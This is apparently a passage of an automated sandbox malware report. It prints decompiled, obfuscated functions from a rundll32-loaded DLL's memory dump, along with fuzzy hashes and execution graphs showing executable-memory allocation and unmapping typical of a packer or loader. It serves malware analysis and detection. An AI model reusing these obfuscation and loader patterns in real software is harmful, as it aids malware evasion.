				_t127 = __eflags;
				_push(_a4);
				_t123 = __edx;
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t98);
				_v12 = 0xc25e;
				_v12 = _v12 + 0x640;
				_v12 = _v12 >> 6;
				_v12 = _v12 ^ 0x00002769;
				_v28 = 0x9724;
				_v28 = _v28 + 0xffffe0ea;
				_v28 = _v28 ^ 0x0000700e;
				_v36 = 0xd445;
				_v36 = _v36 + 0xc80e;
				_v36 = _v36 ^ 0x00018cef;
				_v8 = 0x911f;
				_v8 = _v8 | 0xd3d72903;
				_v8 = _v8 + 0xffff9c88;
				_v8 = _v8 | 0xe1b9dc18;
				_v8 = _v8 ^ 0xf3ffe9be;
				_v32 = 0xd288;
				_v32 = _v32 + 0xffff6c28;
				_v32 = _v32 ^ 0x00003b07;
				_v16 = 0xcde8;
				_t115 = 0x5e;
				_v16 = _v16 / _t115;
				_v16 = _v16 + 0x2b64;
				_v16 = _v16 ^ 0x000023ad;
				_v24 = 0x1639;
				_v24 = _v24 * 0x5c;
				_v24 = _v24 + 0xffff5760;
				_v24 = _v24 ^ 0x000752a1;
				_v44 = 0x95b;
				_v44 = _v44 << 3;
				_v44 = _v44 ^ 0x00001f3a;
				_v40 = 0x26d1;
				_v40 = _v40 ^ 0x9e4bdb03;
				_v40 = _v40 ^ 0x9e4bb6e2;
				_v20 = 0xcf3;
				_v20 = _v20 + 0xffff8a18;
				_v20 = _v20 ^ 0xde1588ed;
				_v20 = _v20 ^ 0x21ea1839;
				_v48 = E10013B73();
				_v28 = 0x7de3;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 ^ 0x00000003;
				_v12 = 0xcfd1;
				_push(_t115);
				_v12 = _v12 * 0x36;
				_v12 = _v12 >> 9;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00000015;
				_t124 = E100180F6(_v12, _v28, _t127);
				E1001C7CD( &_v48, _t123, _v24, _v44, _v40, 1, _t124, _v20);
				 *((short*)(_t123 + _t124 * 2)) = 0;
				return 0;
			}

0x1001a2e5
0x1001a2ed
0x1001a2f0
0x1001a2f2
0x1001a2f3
0x1001a2f4
0x1001a2f9
0x1001a302
0x1001a309
0x1001a30d
0x1001a314
0x1001a31b
0x1001a322
0x1001a329
0x1001a330
0x1001a337
0x1001a33e
0x1001a345
0x1001a34c
0x1001a353
0x1001a35a
0x1001a361
0x1001a368
0x1001a36f
0x1001a376
0x1001a382
0x1001a385
0x1001a388
0x1001a38f
0x1001a396
0x1001a3a1
0x1001a3a4
0x1001a3ab
0x1001a3b2
0x1001a3b9
0x1001a3bd
0x1001a3c4
0x1001a3cb
0x1001a3d2
0x1001a3d9
0x1001a3e0
0x1001a3e7
0x1001a3ee
0x1001a400
0x1001a403
0x1001a40a
0x1001a40e
0x1001a412
0x1001a41d
0x1001a41e
0x1001a421
0x1001a425
0x1001a429
0x1001a447
0x1001a45a
0x1001a464
0x1001a46d

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 832e10844e16e16048eb53dcc9218467a0507bd3233a24ca1574e9739c1e9e5c
Instruction ID: dc1a401ec3bf1c2b3df7d336691c0659359231ecdc901116c898192734ecf4b4
Opcode Fuzzy Hash: 832e10844e16e16048eb53dcc9218467a0507bd3233a24ca1574e9739c1e9e5c
Instruction Fuzzy Hash: C441F271D0130EABDB58CFA5C98A4DEBFB1FB44314F208199D515B62A0C3B85B85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 100026A0, Relevance: .1, Instructions: 88
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E100026A0(void* __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t76;
				void* _t82;
				void* _t83;
				signed int _t85;
				signed int _t86;
				intOrPtr _t93;
				void* _t94;
				signed int* _t96;

				_t96 =  &_v44;
				_v12 = 0x58b901;
				_t93 = 0;
				_t83 = __ecx;
				_v8 = 0;
				_t94 = 0x1ac1cbb6;
				_v4 = 0;
				_v44 = 0x1a29;
				_v44 = _v44 << 0xf;
				_v44 = _v44 >> 0xd;
				_t85 = 0x68;
				_v44 = _v44 / _t85;
				_v44 = _v44 ^ 0x00002e10;
				_v24 = 0x4bd2;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x00015d04;
				_v28 = 0xdc4f;
				_v28 = _v28 | 0x0afa3a61;
				_v28 = _v28 ^ 0x0afae686;
				_v32 = 0xf7fc;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x3dff2528;
				_v36 = 0xd3c9;
				_t86 = 0x55;
				_v36 = _v36 / _t86;
				_v36 = _v36 << 0xd;
				_v36 = _v36 ^ 0x004fde57;
				_v16 = 0xf860;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x0000186e;
				_v40 = 0x4381;
				_v40 = _v40 << 6;
				_v40 = _v40 + 0xffffaddd;
				_v40 = _v40 ^ 0x88d4d291;
				_v40 = _v40 ^ 0x88c4748f;
				_v20 = 0xc7ab;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x000019db;
				do {
					while(_t94 != 0x63f4e50) {
						if(_t94 == 0x1ac1cbb6) {
							_t94 = 0x3b51da91;
							continue;
						} else {
							if(_t94 == 0x3b51da91) {
								_t82 = E1001814A();
								_t96 = _t96 - 0xc + 0xc;
								_t94 = 0x63f4e50;
								_t93 = _t93 + _t82;
								continue;
							}
						}
						goto L7;
					}
					_t76 = E100116E3(_v36, _v16, _v40, _t83 + 4, _v20);
					_t96 =  &(_t96[3]);
					_t94 = 0x3b3bfa4b;
					_t93 = _t93 + _t76;
					L7:
				} while (_t94 != 0x3b3bfa4b);
				return _t93;
			}

0x100026a0
0x100026a3
0x100026b1
0x100026b3
0x100026b5
0x100026b9
0x100026be
0x100026c7
0x100026cf
0x100026d4
0x100026df
0x100026e4
0x100026ea
0x100026f2
0x100026fa
0x100026ff
0x10002707
0x1000270f
0x10002717
0x1000271f
0x10002727
0x1000272c
0x10002734
0x10002740
0x10002743
0x10002747
0x1000274c
0x10002754
0x1000275c
0x10002761
0x10002769
0x10002771
0x10002776
0x1000277e
0x10002786
0x1000278e
0x10002796
0x1000279b
0x100027a3
0x100027a3
0x100027b1
0x100027db
0x00000000
0x100027b3
0x100027b5
0x100027ca
0x100027cf
0x100027d2
0x100027d7
0x00000000
0x100027d7
0x100027b5
0x00000000
0x100027b1
0x100027f3
0x100027f8
0x100027fb
0x10002800
0x10002802
0x10002802
0x10002813

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0a2a2bea74d570145c3c06be963f1e1d42539b00e1b26c16524673e156b2778
Instruction ID: c805615ff588f4fc297088b66985a4962678b3ec424885a1619d17c963cf7c3e
Opcode Fuzzy Hash: e0a2a2bea74d570145c3c06be963f1e1d42539b00e1b26c16524673e156b2778
Instruction Fuzzy Hash: BD31577690D3018FD344CF25D48940FFBE1EBD4798F054A6DF899AA260D3B4CA588B97

Uniqueness

Uniqueness Score: -1.00%

Function 100107D3, Relevance: .1, Instructions: 88
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E100107D3(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char _v564;
				intOrPtr* _t93;
				signed int _t97;
				short _t98;

				_v44 = 0;
				_v8 = 0xbdb1;
				_t97 = 0x7c;
				_t98 =  &_v564;
				_v8 = _v8 / _t97;
				_v8 = _v8 ^ 0x84d78ab0;
				_v8 = _v8 | 0x04397d51;
				_v8 = _v8 ^ 0x84ff98b9;
				_v20 = 0x9959;
				_v20 = _v20 + 0xffff882d;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 ^ 0x2029a499;
				_v20 = _v20 ^ 0x2029dae5;
				_v12 = 0xc145;
				_v12 = _v12 * 0x70;
				_v12 = _v12 ^ 0x544693c8;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0xc72f366b;
				_v32 = 0x5b50;
				_v32 = _v32 + 0xd2e7;
				_v32 = _v32 ^ 0x000118f1;
				_v24 = 0x137d;
				_v24 = _v24 + 0x8c27;
				_v24 = _v24 ^ 0xb81c9100;
				_v24 = _v24 ^ 0xbaee9a22;
				_v24 = _v24 ^ 0x02f28e37;
				_v40 = 0xf304;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x3cc111aa;
				_v36 = 0xa065;
				_v36 = _v36 ^ 0xd4507cab;
				_v36 = _v36 ^ 0xd4508823;
				_v28 = 0x2623;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x00012a9a;
				_v16 = 0x6baa;
				_v16 = _v16 + 0xa65f;
				_v16 = _v16 | 0x7cf3a6c3;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0xcf3b1219;
				if(E1000AD3C(_t98, _v8, _v20, _v12) != 0) {
					_t93 =  &_v564;
					if(_v564 != 0) {
						while( *_t93 != 0x5c) {
							_t93 = _t93 + 2;
							if( *_t93 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t98 = 0;
						 *((short*)(_t93 + 2)) = 0;
					}
					L6:
					_push(_v16);
					_push(_v28);
					_push( &_v564);
					_push(_t98);
					_push(_v36);
					_push(_v40);
					_push( &_v44);
					E100025DE(_v32, _v24);
				}
				return _v44;
			}

0x100107e1
0x100107e4
0x100107f0
0x100107f3
0x100107f9
0x100107fc
0x10010803
0x1001080a
0x10010811
0x10010818
0x1001081f
0x10010823
0x1001082a
0x10010831
0x1001083c
0x1001083f
0x1001084a
0x1001084d
0x10010854
0x1001085b
0x10010862
0x10010869
0x10010870
0x10010877
0x1001087e
0x10010885
0x1001088c
0x10010893
0x10010897
0x1001089e
0x100108a5
0x100108ac
0x100108b3
0x100108ba
0x100108be
0x100108c5
0x100108cc
0x100108d3
0x100108da
0x100108de
0x100108f8
0x100108fa
0x10010907
0x10010909
0x1001090f
0x10010915
0x00000000
0x00000000
0x10010917
0x00000000
0x10010915
0x10010919
0x1001091b
0x1001091b
0x1001091f
0x1001091f
0x10010928
0x1001092b
0x1001092c
0x1001092d
0x10010933
0x1001093c
0x10010940
0x10010945
0x1001094f

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab277858e9f73df25cc0c75edbdff45429ab9e24ea314ab3d4a584f8627f7fd
Instruction ID: d3874ef76219ef3bfcad25a2d896ffe38b9e5e83cffeecf3f58305473ce0cdf9
Opcode Fuzzy Hash: 0ab277858e9f73df25cc0c75edbdff45429ab9e24ea314ab3d4a584f8627f7fd
Instruction Fuzzy Hash: F041F071D0021EEBEF49DFA0C95A8EEBBB0FB04304F208189D001B6260D3B85B95DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001821E, Relevance: .1, Instructions: 82
COMMONCrypto

Download Yara Rule

C-Code - Quality: 58%

			E1001821E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, intOrPtr _a40) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				void* _t65;
				intOrPtr* _t81;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;

				E10017B8C(_t65);
				_v12 = 0xee35;
				_v12 = _v12 + 0xffff4b7f;
				_v12 = _v12 ^ 0x3b25a783;
				_v12 = _v12 + 0xfffff248;
				_v12 = _v12 ^ 0x3b25ca16;
				_v8 = 0x6688;
				_t84 = 0x45;
				_v8 = _v8 / _t84;
				_t85 = 0xa;
				_v8 = _v8 / _t85;
				_t86 = 0x4a;
				_v8 = _v8 / _t86;
				_v8 = _v8 ^ 0x00005ced;
				_v16 = 0x899;
				_t87 = 0x15;
				_v16 = _v16 / _t87;
				_t88 = 0x7a;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x00006e6f;
				_v20 = 0x4da;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x00003bf2;
				_t81 = E10004010(_t88, 0x117358b6, 0x233, _t88, 0x323d5642);
				return  *_t81(_a16, _a36, 0x60, _a4, 0, 0, __ecx, __edx, _a4, 0, 0x60, _a16, _a20, _a24, _a28, 0, _a36, _a40);
			}

0x10018242
0x10018247
0x10018250
0x10018257
0x1001825e
0x10018265
0x1001826c
0x10018278
0x1001827d
0x10018285
0x1001828a
0x10018292
0x10018297
0x1001829c
0x100182a3
0x100182ad
0x100182b2
0x100182ba
0x100182c5
0x100182c8
0x100182cf
0x100182d6
0x100182da
0x100182f8
0x10018313

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e61fb9667f2ddf00e39c01e268c7aa162fc2d01492bcc221a98ba8ab01c626e
Instruction ID: 90a8aa4c19dfb6a7a2d919cf29c35e1d3d2400a1e0071dfd0d5ff106f8a55e19
Opcode Fuzzy Hash: 8e61fb9667f2ddf00e39c01e268c7aa162fc2d01492bcc221a98ba8ab01c626e
Instruction Fuzzy Hash: 1C31EB75E00208FFEB04CFA5DC4A9DEBFB6EB45354F11C189F51466290D7B65A219B80

Uniqueness

Uniqueness Score: -1.00%

Function 1001A02C, Relevance: .1, Instructions: 75
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E1001A02C(signed char* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t59;
				signed char* _t70;
				signed int _t72;
				void* _t82;
				void* _t83;

				_push(_a20);
				_t70 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t59);
				_v8 = 0x4f3e;
				_v8 = _v8 << 9;
				_t83 = 0;
				_v8 = _v8 ^ 0x1d6475ac;
				_t72 = 0x2b;
				_v8 = _v8 / _t72;
				_v8 = _v8 ^ 0x00b244b2;
				_v16 = 0x1671;
				_v16 = _v16 ^ 0x9d261d55;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00024b29;
				_v12 = 0xabc7;
				_v12 = _v12 + 0x846d;
				_v12 = _v12 ^ 0x093345c4;
				_v12 = _v12 ^ 0x09320740;
				_v20 = 0xe9dd;
				_v20 = _v20 | 0xf26de7bc;
				_v20 = _v20 ^ 0xf26dff19;
				_v28 = 0x5258;
				_v28 = _v28 ^ 0x459567e3;
				_v28 = _v28 ^ 0x45954091;
				_v24 = 0xd898;
				_v24 = _v24 | 0x1e6929f3;
				_v24 = _v24 ^ 0x1e69e475;
				_t82 = E1000A0AD(0x40000, _v8 % _t72);
				if(_t82 != 0) {
					_push(_t82);
					_push(_a12);
					_push(_a20);
					_t83 = E1000D185(_t70, _a8);
					E100033F4(_v12, _v20, _v28, _v24, _t82);
				}
				return _t83;
			}

0x1001a035
0x1001a038
0x1001a03a
0x1001a03d
0x1001a040
0x1001a043
0x1001a046
0x1001a047
0x1001a048
0x1001a04d
0x1001a056
0x1001a05a
0x1001a05c
0x1001a068
0x1001a073
0x1001a076
0x1001a07d
0x1001a084
0x1001a08b
0x1001a08f
0x1001a096
0x1001a09d
0x1001a0a4
0x1001a0b1
0x1001a0b8
0x1001a0bf
0x1001a0c6
0x1001a0cd
0x1001a0d4
0x1001a0db
0x1001a0e2
0x1001a0e9
0x1001a0f0
0x1001a102
0x1001a107
0x1001a10e
0x1001a10f
0x1001a112
0x1001a11e
0x1001a129
0x1001a12e
0x1001a139

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce7b0b64186a3cdfd76440f1da54e30841a36925943d5aa199563e2cc1b1a93d
Instruction ID: 377b2852a3a1bf737bfe56368d829a573d3513bdfe4b9d91363b8ba1780600ef
Opcode Fuzzy Hash: ce7b0b64186a3cdfd76440f1da54e30841a36925943d5aa199563e2cc1b1a93d
Instruction Fuzzy Hash: 66316475E0020DABDF04CFA0C84A8AFBFB2FB40354F608099E915A7260C7768B64DF90

Uniqueness

Uniqueness Score: -1.00%

Function 100033F4, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E100033F4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t69;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t69);
				_v32 = _v32 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v40 = 0x4e0ab6;
				_v36 = 0x10f875;
				_v16 = 0xa2a6;
				_v16 = _v16 >> 1;
				_v16 = _v16 ^ 0xf8b01a97;
				_v16 = _v16 ^ 0xf8b06301;
				_v20 = 0x825f;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0xf632c572;
				_v20 = _v20 ^ 0xf630cc50;
				_v12 = 0x991e;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffffbd32;
				_v12 = _v12 ^ 0x01faf384;
				_v24 = 0x8dc5;
				_v24 = _v24 + 0xfffffa46;
				_v24 = _v24 ^ 0x00008eca;
				_v12 = 0xdc1e;
				_v12 = _v12 + 0xfffffc9a;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 * 0x7f;
				_v12 = _v12 ^ 0x11a3e90b;
				_v8 = 0x4b6d;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x267f5ad4;
				_v8 = _v8 + 0xffffff5d;
				_v8 = _v8 ^ 0x6d124c98;
				_v20 = 0x323d;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x09d740c0;
				_v20 = _v20 ^ 0x09b37b3f;
				return E1001BE96(_v24, E1000A318(), _a12, _v12, _v8, _v20);
			}

0x100033fa
0x100033fd
0x10003400
0x10003403
0x10003404
0x10003405
0x1000340a
0x1000340e
0x10003412
0x10003419
0x10003420
0x10003427
0x1000342a
0x10003431
0x10003438
0x1000343f
0x10003443
0x1000344a
0x10003451
0x1000345c
0x1000345f
0x10003463
0x1000346a
0x10003471
0x10003478
0x1000347f
0x10003486
0x1000348d
0x10003498
0x1000349f
0x100034a2
0x100034a9
0x100034b0
0x100034b4
0x100034bb
0x100034c2
0x100034c9
0x100034d0
0x100034d4
0x100034db
0x10003509

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af1b6885b0b32aa53b04c30637edc936b233755d7c1623c00e9d73c5891a307
Instruction ID: 6698e3f3b9ba9fa2389dafb958001e06c945fef8cc5759478ba4f7249020a7cd
Opcode Fuzzy Hash: 0af1b6885b0b32aa53b04c30637edc936b233755d7c1623c00e9d73c5891a307
Instruction Fuzzy Hash: 2E31D1B1C0030AEBDF44DFE4C98A5AEBFB0FB14318F208698D4216A2A0D7B55795CF81

Uniqueness

Uniqueness Score: -1.00%

Function 1000422B, Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8398a520d068efe2c883cc97e34a1f63be52e17d42352ef870978ba684f8d25
Instruction ID: f9d695710773f5eb93a61d65c65f51c50272d76899cf3e9b2e944e79d0d90fdb
Opcode Fuzzy Hash: a8398a520d068efe2c883cc97e34a1f63be52e17d42352ef870978ba684f8d25
Instruction Fuzzy Hash: 601125B5D0120CEBEB19DFA4D94A9EEBBB4FF10318F108198E405A7244D7B59B48CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1000A823, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A823() {

				return  *[fs:0x30];
			}

0x1000a829

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2700 Parent PID: 2296 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 0028FB30, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0028FB75
UnmapViewOfFile.KERNELBASE(?), ref: 0028FC25
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0028FC3F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0028FD70

Memory Dump Source

Source File: 00000008.00000002.2121175591.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_270000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: f2eebb01af500993f289348e72a251cfe0762c887f12ac358e62e4ce3b057859
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 42B1AA75A01109DFCB48DF84C590AAEB7B5FF88304F208159E915AB385D735EE92CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0028F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0028F5D4

Strings

VirtualAlloc, xrefs: 0028F5B9, 0028F5BC

Memory Dump Source

Source File: 00000008.00000002.2121175591.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_270000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: 67923e6b1467e6e9638875d044699cbd1f5cbd9f7d58ce934f947e22b4ee16db
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 2C113064D082C9EEEB01DBE894097EEBFB55B11704F044098D5446A282D2BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2824 Parent PID: 2700 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 0014FB30, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014FB75
UnmapViewOfFile.KERNELBASE(?), ref: 0014FC25
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0014FC3F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0014FD70

Memory Dump Source

Source File: 00000009.00000002.2131191115.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_130000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 8a1153281cf7b3d8a74905fabf6c6c09a49ce1311eafc2b1b0eded3b52a143ad
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 7BB188B5E001099FCB48CF84D590EAEB7B5FF88314F248159E919AB355D735EE82CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0014F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0014F5D4

Strings

VirtualAlloc, xrefs: 0014F5B9, 0014F5BC

Memory Dump Source

Source File: 00000009.00000002.2131191115.0000000000130000.00000040.00000001.sdmp, Offset: 00130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_130000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: c6c412b1bbc447a28259970365211f4b63b13cc70bc42bd4fb778739b311ea40
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: 3B113360D08289EEEB01D7E8C4057EEBFB55B21704F044098E5446A382D3BA5759C7A6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2844 Parent PID: 2824 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	13
Total number of Limit Nodes:	1

Executed Functions

Function 0019FB30, Relevance: 6.2, APIs: 4, Instructions: 240
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0019FB75
UnmapViewOfFile.KERNELBASE(?), ref: 0019FC25
VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 0019FC3F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0019FD70

Memory Dump Source

Source File: 0000000A.00000002.2145212500.0000000000180000.00000040.00000001.sdmp, Offset: 00180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_180000_rundll32.jbxd

Similarity

API ID: Virtual$Alloc$FileProtectUnmapView
String ID:
API String ID: 238919573-0
Opcode ID: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction ID: 4301d48abf177ebe90760239a07af0eb2c69c163b1270af7d412781154210f3b
Opcode Fuzzy Hash: 1b681560b31ab1fa3c6958bc8e5e4eab1b098814898b8afb978e367329f6d893
Instruction Fuzzy Hash: 0EB19AB5E00109EFCB48CF84D590EAEB7B5BF88314F248159E919AB355D735EE82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0019F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

